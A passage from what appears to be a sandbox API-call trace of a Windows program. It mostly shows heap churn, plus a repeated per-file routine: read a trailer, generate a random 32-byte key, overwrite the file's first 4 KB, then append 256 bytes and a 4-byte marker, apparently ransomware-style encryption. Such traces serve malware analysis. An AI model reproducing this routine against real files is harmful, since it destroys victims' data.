(HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.766] GetProcessHeap () returned 0x280000 [0078.766] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.766] GetProcessHeap () returned 0x280000 [0078.767] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0078.767] GetProcessHeap () returned 0x280000 [0078.767] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.768] GetProcessHeap () returned 0x280000 [0078.768] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.768] GetProcessHeap () returned 0x280000 [0078.769] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.769] GetProcessHeap () returned 0x280000 [0078.769] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0078.769] GetProcessHeap () returned 0x280000 [0078.770] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.770] GetProcessHeap () returned 0x280000 [0078.770] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0078.770] GetProcessHeap () returned 0x280000 [0078.770] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0078.770] GetProcessHeap () returned 0x280000 [0078.770] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0078.770] GetProcessHeap () returned 0x280000 [0078.770] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0078.770] SetFilePointerEx (in: hFile=0x850, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.770] WriteFile (in: hFile=0x850, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.770] WriteFile (in: hFile=0x850, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.770] GetProcessHeap () returned 0x280000 [0078.770] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0078.770] GetProcessHeap () returned 0x280000 [0078.770] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0078.770] GetProcessHeap () returned 0x280000 [0078.770] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0078.770] CloseHandle (hObject=0x850) returned 1 [0078.772] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 51 [0078.772] SetFilePointerEx (in: hFile=0x854, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.772] ReadFile (in: hFile=0x854, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.772] SetFilePointerEx (in: hFile=0x854, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.772] GetProcessHeap () returned 0x280000 [0078.772] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0078.772] GetProcessHeap () returned 0x280000 [0078.772] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0078.772] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0078.772] GetProcessHeap () returned 0x280000 [0078.772] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0078.772] ReadFile (in: hFile=0x854, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.826] SetFilePointerEx (in: hFile=0x854, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.826] WriteFile (in: hFile=0x854, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.827] GetProcessHeap () returned 0x280000 [0078.827] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0078.827] GetProcessHeap () returned 0x280000 [0078.827] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.827] GetProcessHeap () returned 0x280000 [0078.827] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0078.827] GetProcessHeap () returned 0x280000 [0078.827] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.827] GetProcessHeap () returned 0x280000 [0078.827] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0078.827] GetProcessHeap () returned 0x280000 [0078.827] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.827] GetProcessHeap () returned 0x280000 [0078.827] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.827] GetProcessHeap () returned 0x280000 [0078.827] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.827] GetProcessHeap () returned 0x280000 [0078.827] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.827] GetProcessHeap () returned 0x280000 [0078.827] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.827] GetProcessHeap () returned 0x280000 [0078.828] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.828] GetProcessHeap () returned 0x280000 [0078.828] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0078.829] GetProcessHeap () returned 0x280000 [0078.829] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.830] GetProcessHeap () returned 0x280000 [0078.830] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0078.831] GetProcessHeap () returned 0x280000 [0078.831] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0078.831] SetFilePointerEx (in: hFile=0x854, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.832] WriteFile (in: hFile=0x854, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.832] WriteFile (in: hFile=0x854, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.832] GetProcessHeap () returned 0x280000 [0078.832] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0078.832] GetProcessHeap () returned 0x280000 [0078.832] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0078.832] GetProcessHeap () returned 0x280000 [0078.832] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0078.832] CloseHandle (hObject=0x854) returned 1 [0078.833] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 52 [0078.833] SetFilePointerEx (in: hFile=0x858, 